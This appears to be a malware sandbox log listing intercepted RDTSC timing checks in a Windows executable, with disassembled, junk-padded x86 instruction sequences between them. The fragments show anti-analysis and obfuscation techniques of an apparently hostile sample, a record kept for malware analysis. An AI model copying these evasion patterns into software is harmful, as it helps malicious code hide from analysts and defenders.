Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BCDCC second address: 12BCDE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FF8E8F8DBBCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BCDE3 second address: 12BCDED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FF8E8F833B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BCEF4 second address: 12BCF01 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BCF01 second address: 12BCF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF8E8F833B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BCF0C second address: 12BCF11 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BCF11 second address: 12BCF8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FF8E8F833B8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 push 00000000h 0x00000024 cld 0x00000025 call 00007FF8E8F833B9h 0x0000002a pushad 0x0000002b push ebx 0x0000002c push ebx 0x0000002d pop ebx 0x0000002e pop ebx 0x0000002f jmp 00007FF8E8F833BCh 0x00000034 popad 0x00000035 push eax 0x00000036 push edi 0x00000037 push eax 0x00000038 push eax 0x00000039 pop eax 0x0000003a pop eax 0x0000003b pop edi 0x0000003c mov eax, dword ptr [esp+04h] 0x00000040 push eax 0x00000041 jno 00007FF8E8F833BCh 0x00000047 pop eax 0x00000048 mov eax, dword ptr [eax] 0x0000004a push eax 0x0000004b push edx 0x0000004c jg 00007FF8E8F833C8h 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BCF8E second address: 12BCFA9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jo 00007FF8E8F8DBC4h 0x00000012 pushad 0x00000013 jc 00007FF8E8F8DBB6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BD0DD second address: 12BD0E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BD0E3 second address: 12BD188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FF8E8F8DBC1h 0x0000000b jmp 00007FF8E8F8DBBBh 0x00000010 popad 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jmp 00007FF8E8F8DBC3h 0x0000001a pop eax 0x0000001b adc ecx, 2BEFA599h 0x00000021 push 00000003h 0x00000023 js 00007FF8E8F8DBBCh 0x00000029 add dword ptr [ebp+122D2CEFh], edi 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007FF8E8F8DBB8h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 00000017h 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b sub dword ptr [ebp+122D2D07h], ebx 0x00000051 jo 00007FF8E8F8DBC8h 0x00000057 jmp 00007FF8E8F8DBC2h 0x0000005c push 00000003h 0x0000005e mov esi, dword ptr [ebp+122D37C2h] 0x00000064 pushad 0x00000065 jl 00007FF8E8F8DBBBh 0x0000006b mov ecx, 0FF148B7h 0x00000070 popad 0x00000071 push 7CFEE0B3h 0x00000076 pushad 0x00000077 jng 00007FF8E8F8DBBCh 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BD188 second address: 12BD1CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b add dword ptr [esp], 43011F4Dh 0x00000012 jmp 00007FF8E8F833C6h 0x00000017 lea ebx, dword ptr [ebp+1244EBF0h] 0x0000001d push ebx 0x0000001e jbe 00007FF8E8F833BCh 0x00000024 or dword ptr [ebp+122D316Ch], esi 0x0000002a pop edi 0x0000002b xchg eax, ebx 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jg 00007FF8E8F833B6h 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BD1CE second address: 12BD1E0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FF8E8F8DBB8h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BD1E0 second address: 12BD1E5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B5A50 second address: 12B5A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC607 second address: 12DC60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC60C second address: 12DC62F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF8E8F8DBC5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c jno 00007FF8E8F8DBB6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DCFB4 second address: 12DCFCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F833C7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DCFCF second address: 12DCFD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DD128 second address: 12DD132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF8E8F833B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DD132 second address: 12DD13C instructions: 0x00000000 rdtsc 0x00000002 je 00007FF8E8F8DBB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DD13C second address: 12DD155 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF8E8F833BAh 0x0000000a jbe 00007FF8E8F833B6h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DD71C second address: 12DD742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF8E8F8DBC8h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DD742 second address: 12DD763 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F833C7h 0x00000007 jc 00007FF8E8F833B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DD763 second address: 12DD773 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 js 00007FF8E8F8DBB6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D16E9 second address: 12D16EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DE2A0 second address: 12DE2A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AD2AE second address: 12AD2B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AD2B4 second address: 12AD2BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AD2BE second address: 12AD2C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AD2C2 second address: 12AD2C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AD2C6 second address: 12AD2D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FF8E8F833B6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AD2D5 second address: 12AD2EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF8E8F8DBBDh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AD2EA second address: 12AD2EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8CE6 second address: 12E8CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8CEC second address: 12E8CF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8CF0 second address: 12E8D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FF8E8F8DBC2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8D00 second address: 12E8D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8D06 second address: 12E8D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jne 00007FF8E8F8DBB6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8D13 second address: 12E8D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF8E8F833C5h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF8E8F833C5h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8EF2 second address: 12E8F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8E8F8DBC8h 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8F0F second address: 12E8F25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FF8E8F833B6h 0x00000009 jmp 00007FF8E8F833BBh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E907B second address: 12E9097 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FF8E8F8DBC0h 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E9097 second address: 12E909D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E9377 second address: 12E9393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8E8F8DBC8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E9681 second address: 12E968B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E968B second address: 12E96A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBC4h 0x00000007 jo 00007FF8E8F8DBB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E96A9 second address: 12E96BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF8E8F833BCh 0x00000009 jng 00007FF8E8F833B6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA646 second address: 12EA64B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA64B second address: 12EA651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EABDD second address: 12EABEB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF8E8F8DBB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EABEB second address: 12EABEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAD81 second address: 12EAD86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAD86 second address: 12EAD90 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF8E8F833BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAD90 second address: 12EAD9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAD9C second address: 12EADA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAE7A second address: 12EAE7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAE7E second address: 12EAEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FF8E8F833B8h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF8E8F833C6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB64B second address: 12EB650 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB712 second address: 12EB716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB716 second address: 12EB71C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EC6F2 second address: 12EC6F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EC6F7 second address: 12EC6FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EDEBF second address: 12EDEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EE9ED second address: 12EE9F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EEC60 second address: 12EEC64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EEC64 second address: 12EECCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF8E8F8DBBCh 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FF8E8F8DBB8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edx 0x0000002e call 00007FF8E8F8DBB8h 0x00000033 pop edx 0x00000034 mov dword ptr [esp+04h], edx 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc edx 0x00000041 push edx 0x00000042 ret 0x00000043 pop edx 0x00000044 ret 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FF8E8F8DBC2h 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EECCE second address: 12EECD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EF4C4 second address: 12EF4C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EFFD2 second address: 12EFFDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FF8E8F833B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F2781 second address: 12F2785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F14B1 second address: 12F14B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8C35 second address: 12F8C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8C39 second address: 12F8C5D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF8E8F833B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF8E8F833C6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8C5D second address: 12F8C62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8C62 second address: 12F8C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8C68 second address: 12F8CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jo 00007FF8E8F8DBBCh 0x0000000e add ebx, dword ptr [ebp+1245D9F1h] 0x00000014 push 00000000h 0x00000016 call 00007FF8E8F8DBBFh 0x0000001b mov ebx, dword ptr [ebp+12450916h] 0x00000021 pop edi 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007FF8E8F8DBB8h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 0000001Ch 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e push eax 0x0000003f pushad 0x00000040 jns 00007FF8E8F8DBB8h 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FAB86 second address: 12FAB8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FAB8A second address: 12FABA9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF8E8F8DBB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FF8E8F8DBBCh 0x00000010 jp 00007FF8E8F8DBB6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FABA9 second address: 12FABAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FABAE second address: 12FABB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FF8E8F8DBB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FABB9 second address: 12FABC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF8E8F833B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FABC5 second address: 12FABE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF8E8F8DBC3h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push edx 0x0000000e jno 00007FF8E8F8DBB6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AEDA9 second address: 12AEDAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AEDAE second address: 12AEDB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC11B second address: 12FC11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FB3A7 second address: 12FB3AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC11F second address: 12FC125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FB3AD second address: 12FB406 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FF8E8F8DBB8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c or dword ptr [ebp+12470E4Dh], ebx 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 jmp 00007FF8E8F8DBBAh 0x0000003e mov eax, dword ptr [ebp+122D1425h] 0x00000044 push FFFFFFFFh 0x00000046 add dword ptr [ebp+122D2D15h], edx 0x0000004c nop 0x0000004d push eax 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FB406 second address: 12FB40C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
